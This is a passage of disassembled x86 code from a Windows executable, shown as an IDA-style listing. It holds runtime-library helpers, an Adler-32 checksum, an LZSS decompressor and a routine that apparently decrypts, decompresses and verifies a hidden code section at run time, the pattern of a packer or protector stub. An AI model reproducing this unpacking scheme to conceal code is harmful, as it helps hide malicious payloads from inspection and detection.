mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4FCC56
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4FCC56: ; CODE XREF: sub_4FCA80+1C2�j
cmp ebx, edi
jz short loc_4FCC0E
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_50E034 ; LCMapStringW
test eax, eax
jz short loc_4FCC0E
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4FCC7D
push edi
push edi
jmp short loc_4FCC83
; ---------------------------------------------------------------------------
loc_4FCC7D: ; CODE XREF: sub_4FCA80+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4FCC83: ; CODE XREF: sub_4FCA80+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_50E040 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_4FCC0E
loc_4FCC9D: ; CODE XREF: sub_4FCA80+165�j
; sub_4FCA80+188�j
mov eax, esi
jmp loc_4FCC10
sub_4FCA80 endp
; =============== S U B R O U T I N E =======================================
sub_4FCCA4 proc near ; CODE XREF: sub_4FCA80+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4FCCC1
loc_4FCCB4: ; CODE XREF: sub_4FCCA4+1B�j
cmp byte ptr [eax], 0
jz short loc_4FCCC1
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4FCCB4
loc_4FCCC1: ; CODE XREF: sub_4FCCA4+E�j
; sub_4FCCA4+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4FCCCC
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4FCCCC: ; CODE XREF: sub_4FCCA4+21�j
mov eax, edx
retn
sub_4FCCA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FCCCF proc near ; CODE XREF: sub_4FC86E+46�p
; sub_4FC9EA+17�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_4FCCED
mov ecx, ds:off_511450
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4FCD3F
; ---------------------------------------------------------------------------
loc_4FCCED: ; CODE XREF: sub_4FCCCF+10�j
mov ecx, eax
push esi
mov esi, ds:off_511450
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4FCD12
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4FCD1B
; ---------------------------------------------------------------------------
loc_4FCD12: ; CODE XREF: sub_4FCCCF+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4FCD1B: ; CODE XREF: sub_4FCCCF+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4FCDBF
add esp, 1Ch
test eax, eax
jnz short loc_4FCD3B
leave
retn
; ---------------------------------------------------------------------------
loc_4FCD3B: ; CODE XREF: sub_4FCCCF+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4FCD3F: ; CODE XREF: sub_4FCCCF+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_4FCCCF endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_4FCD69
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4FCD69: ; CODE XREF: _5:004FCD5E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4FCD90 proc near ; CODE XREF: sub_4FCA80+FD�p
; sub_4FCA80+1B1�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4FCDB0
loc_4FCD9C: ; CODE XREF: sub_4FCD90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4FCD9C
loc_4FCDB0: ; CODE XREF: sub_4FCD90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4FCD90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FCDBF proc near ; CODE XREF: sub_4FCCCF+5E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EB20
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_51610C
xor ebx, ebx
cmp eax, ebx
jnz short loc_4FCE2E
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_50EB00
push esi
call ds:dword_50E048 ; GetStringTypeW
test eax, eax
jz short loc_4FCE0C
mov eax, esi
jmp short loc_4FCE29
; ---------------------------------------------------------------------------
loc_4FCE0C: ; CODE XREF: sub_4FCDBF+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_50EAFC
push esi
push ebx
call ds:dword_50E030 ; GetStringTypeA
test eax, eax
jz loc_4FCEF4
push 2
pop eax
loc_4FCE29: ; CODE XREF: sub_4FCDBF+4B�j
mov ds:dword_51610C, eax
loc_4FCE2E: ; CODE XREF: sub_4FCDBF+2F�j
cmp eax, 2
jnz short loc_4FCE57
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_4FCE3F
mov eax, ds:dword_5160F4
loc_4FCE3F: ; CODE XREF: sub_4FCDBF+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_50E030 ; GetStringTypeA
jmp loc_4FCEF6
; ---------------------------------------------------------------------------
loc_4FCE57: ; CODE XREF: sub_4FCDBF+72�j
cmp eax, 1
jnz loc_4FCEF4
cmp [ebp+arg_10], ebx
jnz short loc_4FCE6D
mov eax, ds:dword_516104
mov [ebp+arg_10], eax
loc_4FCE6D: ; CODE XREF: sub_4FCDBF+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_50E044 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_4FCEF4
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4FCD90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4FCF10
add esp, 0Ch
jmp short loc_4FCEC3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4FCEC3: ; CODE XREF: sub_4FCDBF+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4FCEF4
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_50E044 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_4FCEF4
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_50E048 ; GetStringTypeW
jmp short loc_4FCEF6
; ---------------------------------------------------------------------------
loc_4FCEF4: ; CODE XREF: sub_4FCDBF+61�j
; sub_4FCDBF+9B�j ...
xor eax, eax
loc_4FCEF6: ; CODE XREF: sub_4FCDBF+93�j
; sub_4FCDBF+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4FCDBF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4FCF10 proc near ; CODE XREF: sub_4FCDBF+EF�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4FCF63
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4FCF57
neg ecx
and ecx, 3
jz short loc_4FCF39
sub edx, ecx
loc_4FCF33: ; CODE XREF: sub_4FCF10+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4FCF33
loc_4FCF39: ; CODE XREF: sub_4FCF10+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4FCF57
rep stosd
test edx, edx
jz short loc_4FCF5D
loc_4FCF57: ; CODE XREF: sub_4FCF10+18�j
; sub_4FCF10+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4FCF57
loc_4FCF5D: ; CODE XREF: sub_4FCF10+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4FCF63: ; CODE XREF: sub_4FCF10+A�j
mov eax, [esp+arg_0]
retn
sub_4FCF10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4FCF68 proc near ; CODE XREF: sub_4FC454+13�p
jmp ds:dword_50E03C
sub_4FCF68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FCF6E proc near ; CODE XREF: sub_4FD2E0+183�p
; sub_4FD2E0+361�p
; DATA XREF: ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, edi
and esi, 0FFFFh
shr edi, 10h
test ecx, ecx
jnz short loc_4FCF90
push 1
pop eax
jmp loc_4FD083
; ---------------------------------------------------------------------------
loc_4FCF90: ; CODE XREF: sub_4FCF6E+18�j
cmp [ebp+arg_8], 0
jbe loc_4FD07C
push ebx
loc_4FCF9B: ; CODE XREF: sub_4FCF6E+107�j
mov edx, 15B0h
cmp [ebp+arg_8], edx
jnb short loc_4FCFA8
mov edx, [ebp+arg_8]
loc_4FCFA8: ; CODE XREF: sub_4FCF6E+35�j
sub [ebp+arg_8], edx
cmp edx, 10h
jl loc_4FD04B
mov eax, edx
shr eax, 4
mov ebx, eax
neg ebx
shl ebx, 4
add edx, ebx
loc_4FCFC2: ; CODE XREF: sub_4FCF6E+D7�j
movzx ebx, byte ptr [ecx]
add esi, ebx
movzx ebx, byte ptr [ecx+1]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+2]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+3]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+4]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+5]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+6]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+7]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+8]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+9]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ah]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Bh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ch]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Dh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Eh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Fh]
add edi, esi
add esi, ebx
add edi, esi
add ecx, 10h
dec eax
jnz loc_4FCFC2
loc_4FD04B: ; CODE XREF: sub_4FCF6E+40�j
test edx, edx
jz short loc_4FD05A
loc_4FD04F: ; CODE XREF: sub_4FCF6E+EA�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec edx
jnz short loc_4FD04F
loc_4FD05A: ; CODE XREF: sub_4FCF6E+DF�j
mov ebx, 0FFF1h
mov eax, esi
xor edx, edx
mov esi, ebx
div esi
mov eax, edi
mov esi, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
mov edi, edx
ja loc_4FCF9B
pop ebx
loc_4FD07C: ; CODE XREF: sub_4FCF6E+26�j
mov eax, edi
shl eax, 10h
or eax, esi
loc_4FD083: ; CODE XREF: sub_4FCF6E+1D�j
pop edi
pop esi
pop ebp
retn
sub_4FCF6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FD090 proc near ; CODE XREF: sub_4FD2E0+15E�p
; sub_4FD2E0+33C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], ecx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+14h], 0
mov eax, [ebp+var_1C]
mov dword ptr [eax+10h], 0
mov [ebp+var_10], 0
jmp short loc_4FD0E2
; ---------------------------------------------------------------------------
loc_4FD0D9: ; CODE XREF: sub_4FD090+65�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_4FD0E2: ; CODE XREF: sub_4FD090+47�j
cmp [ebp+var_10], 0FEEh
jge short loc_4FD0F7
mov edx, [ebp+var_1C]
add edx, [ebp+var_10]
mov byte ptr [edx+18h], 20h
jmp short loc_4FD0D9
; ---------------------------------------------------------------------------
loc_4FD0F7: ; CODE XREF: sub_4FD090+59�j
mov [ebp+var_8], 0FEEh
mov [ebp+var_4], 0
loc_4FD105: ; CODE XREF: sub_4FD090:loc_4FD236�j
mov eax, [ebp+var_4]
shr eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jnz short loc_4FD139
mov ecx, [ebp+var_1C]
call sub_4FD250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_4FD130
jmp loc_4FD23B
; ---------------------------------------------------------------------------
loc_4FD130: ; CODE XREF: sub_4FD090+99�j
mov edx, [ebp+var_C]
or dh, 0FFh
mov [ebp+var_4], edx
loc_4FD139: ; CODE XREF: sub_4FD090+88�j
mov eax, [ebp+var_4]
and eax, 1
test eax, eax
jz short loc_4FD18A
mov ecx, [ebp+var_1C]
call sub_4FD250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_4FD159
jmp loc_4FD23B
; ---------------------------------------------------------------------------
loc_4FD159: ; CODE XREF: sub_4FD090+C2�j
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4FD290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp loc_4FD236
; ---------------------------------------------------------------------------
loc_4FD18A: ; CODE XREF: sub_4FD090+B1�j
mov ecx, [ebp+var_1C]
call sub_4FD250
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_4FD1A0
jmp loc_4FD23B
; ---------------------------------------------------------------------------
loc_4FD1A0: ; CODE XREF: sub_4FD090+109�j
mov ecx, [ebp+var_1C]
call sub_4FD250
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4FD1B6
jmp loc_4FD23B
; ---------------------------------------------------------------------------
loc_4FD1B6: ; CODE XREF: sub_4FD090+11F�j
mov edx, [ebp+var_14]
and edx, 0F0h
shl edx, 4
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
and ecx, 0Fh
add ecx, 2
mov [ebp+var_14], ecx
mov [ebp+var_18], 0
jmp short loc_4FD1E8
; ---------------------------------------------------------------------------
loc_4FD1DF: ; CODE XREF: sub_4FD090+1A4�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_4FD1E8: ; CODE XREF: sub_4FD090+14D�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jg short loc_4FD236
mov ecx, [ebp+var_10]
add ecx, [ebp+var_18]
and ecx, 0FFFh
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+ecx+18h]
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4FD290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp short loc_4FD1DF
; ---------------------------------------------------------------------------
loc_4FD236: ; CODE XREF: sub_4FD090+F5�j
; sub_4FD090+15E�j
jmp loc_4FD105
; ---------------------------------------------------------------------------
loc_4FD23B: ; CODE XREF: sub_4FD090+9B�j
; sub_4FD090+C4�j ...
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
mov esp, ebp
pop ebp
retn 10h
sub_4FD090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FD250 proc near ; CODE XREF: sub_4FD090+8D�p
; sub_4FD090+B6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jb short loc_4FD26A
or eax, 0FFFFFFFFh
jmp short loc_4FD28B
; ---------------------------------------------------------------------------
loc_4FD26A: ; CODE XREF: sub_4FD250+13�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+14h]
xor edx, edx
mov dl, [ecx+eax]
mov eax, edx
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
add edx, 1
mov ecx, [ebp+var_4]
mov [ecx+14h], edx
loc_4FD28B: ; CODE XREF: sub_4FD250+18�j
mov esp, ebp
pop ebp
retn
sub_4FD250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FD290 proc near ; CODE XREF: sub_4FD090+CF�p
; sub_4FD090+17E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+10h]
cmp edx, [ecx+0Ch]
jb short loc_4FD2AC
jmp short loc_4FD2CD
; ---------------------------------------------------------------------------
loc_4FD2AC: ; CODE XREF: sub_4FD290+18�j
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov dl, byte ptr [ebp+var_8]
mov [ecx+eax], dl
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+10h], ecx
loc_4FD2CD: ; CODE XREF: sub_4FD290+1A�j
mov esp, ebp
pop ebp
retn
sub_4FD290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4FD2E0 proc near ; CODE XREF: _5:loc_4FD700�p
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
push 0
call ds:dword_50E014 ; GetModuleHandleA
mov [ebp+var_18], eax
push 0D440h
push 40h
call ds:dword_50E010 ; LocalAlloc
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
sub eax, 3FAh
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 4
mov [ebp+var_10], ecx
mov [ebp+var_1C], 0
mov [ebp+var_44], 1
mov [ebp+var_30], 0
mov [ebp+var_3C], offset aBarier ; "BARIER"
loc_4FD333: ; CODE XREF: sub_4FD2E0+98�j
; sub_4FD2E0+A0�j
mov edx, [ebp+var_10]
mov eax, [edx]
imul eax, 28h
mov ecx, [ebp+var_4]
add ecx, eax
mov edx, [ebp+var_44]
imul edx, 28h
sub ecx, edx
mov [ebp+var_30], ecx
mov eax, [ebp+var_44]
add eax, 1
mov [ebp+var_44], eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_18]
add edx, [ecx+0Ch]
mov [ebp+var_40], edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov edx, [ebp+var_30]
add ecx, [edx+8]
mov [ebp+var_2C], ecx
mov eax, [ebp+var_40]
cmp eax, [ebp+var_3C]
ja short loc_4FD333
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+var_2C]
jnb short loc_4FD333
mov edx, [ebp+var_40]
mov [ebp+var_20], edx
jmp short loc_4FD393
; ---------------------------------------------------------------------------
loc_4FD38A: ; CODE XREF: sub_4FD2E0+DA�j
mov eax, [ebp+var_40]
add eax, 4
mov [ebp+var_40], eax
loc_4FD393: ; CODE XREF: sub_4FD2E0+A8�j
mov ecx, [ebp+var_40]
cmp ecx, [ebp+var_2C]
jnb short loc_4FD3BC
mov edx, [ebp+var_20]
imul edx, 19660Dh
add edx, 3C6EF375h
mov [ebp+var_20], edx
mov eax, [ebp+var_40]
mov ecx, [eax]
xor ecx, [ebp+var_20]
mov edx, [ebp+var_40]
mov [edx], ecx
jmp short loc_4FD38A
; ---------------------------------------------------------------------------
loc_4FD3BC: ; CODE XREF: sub_4FD2E0+B9�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_38], edx
mov eax, [ebp+var_24]
mov ecx, [eax+8]
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
push edx
push 40h
call ds:dword_50E010 ; LocalAlloc
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4FD400
cmp [ebp+var_38], 10000h
jbe short loc_4FD411
loc_4FD400: ; CODE XREF: sub_4FD2E0+115�j
push 0
push 0
push 0
push 0EF0000FEh
call ds:dword_50E00C ; RaiseException
loc_4FD411: ; CODE XREF: sub_4FD2E0+11E�j
mov ecx, [ebp+var_38]
mov esi, [ebp+var_24]
add esi, 0Ch
mov edi, [ebp+var_1C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_38]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov ecx, [ebp+var_8]
call sub_4FD090
cmp eax, [ebp+var_28]
jz short loc_4FD459
push 0
push 0
push 0
push 0EF0000F8h
call ds:dword_50E00C ; RaiseException
loc_4FD459: ; CODE XREF: sub_4FD2E0+166�j
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_24]
push eax
push 0
call sub_4FCF6E
add esp, 0Ch
cmp eax, [ebp+var_34]
jz short loc_4FD481
push 0
push 0
push 0
push 0EF0000FAh
call ds:dword_50E00C ; RaiseException
loc_4FD481: ; CODE XREF: sub_4FD2E0+18E�j
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_50E008 ; LocalFree
push offset aKernel32_dll_0 ; "kernel32.dll"
call ds:dword_50E014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4FD4B0
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_50E00C ; RaiseException
loc_4FD4B0: ; CODE XREF: sub_4FD2E0+1BD�j
push offset aFlushinstructi ; "FlushInstructionCache"
mov edx, [ebp+var_C]
push edx
call ds:dword_50E004 ; GetProcAddress
mov ds:dword_511670, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_50E004 ; GetProcAddress
mov [ebp+var_14], eax
cmp ds:dword_511670, 0
jnz short loc_4FD4F0
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_50E00C ; RaiseException
loc_4FD4F0: ; CODE XREF: sub_4FD2E0+1FD�j
call [ebp+var_14]
mov ds:dword_51168C, eax
mov [ebp+var_48], 0
mov [ebp+var_68], 3
mov [ebp+var_58], 0
loc_4FD50D: ; CODE XREF: sub_4FD2E0+272�j
; sub_4FD2E0+27A�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
imul edx, 28h
mov eax, [ebp+var_4]
add eax, edx
mov ecx, [ebp+var_68]
imul ecx, 28h
sub eax, ecx
mov [ebp+var_58], eax
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_58]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_64], ecx
mov edx, [ebp+var_58]
mov eax, [ebp+var_18]
add eax, [edx+0Ch]
mov ecx, [ebp+var_58]
add eax, [ecx+8]
mov [ebp+var_54], eax
mov edx, [ebp+var_64]
cmp edx, [ebp+arg_0]
jnb short loc_4FD50D
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_54]
jnb short loc_4FD50D
mov ecx, [ebp+arg_0]
mov [ebp+var_64], ecx
mov edx, [ebp+var_64]
mov [ebp+var_4C], edx
mov eax, [ebp+var_64]
add eax, 0Ch
and al, 0FCh
mov [ebp+var_64], eax
jmp short loc_4FD57E
; ---------------------------------------------------------------------------
loc_4FD575: ; CODE XREF: sub_4FD2E0+2C4�j
mov ecx, [ebp+var_64]
add ecx, 4
mov [ebp+var_64], ecx
loc_4FD57E: ; CODE XREF: sub_4FD2E0+293�j
mov edx, [ebp+var_64]
cmp edx, [ebp+var_54]
jnb short loc_4FD5A6
mov eax, [ebp+var_4C]
imul eax, 19660Dh
add eax, 3C6EF375h
mov [ebp+var_4C], eax
mov ecx, [ebp+var_64]
mov edx, [ecx]
xor edx, [ebp+var_4C]
mov eax, [ebp+var_64]
mov [eax], edx
jmp short loc_4FD575
; ---------------------------------------------------------------------------
loc_4FD5A6: ; CODE XREF: sub_4FD2E0+2A4�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_50], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_60], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_5C], eax
mov ecx, [ebp+var_60]
push ecx
push 40h
call ds:dword_50E010 ; LocalAlloc
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4FD5DE
cmp [ebp+var_60], 10000h
jbe short loc_4FD5EF
loc_4FD5DE: ; CODE XREF: sub_4FD2E0+2F3�j
push 0
push 0
push 0
push 0EF0000FFh
call ds:dword_50E00C ; RaiseException
loc_4FD5EF: ; CODE XREF: sub_4FD2E0+2FC�j
mov ecx, [ebp+var_60]
mov esi, [ebp+arg_0]
add esi, 0Ch
mov edi, [ebp+var_48]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_60]
push edx
mov eax, [ebp+var_48]
push eax
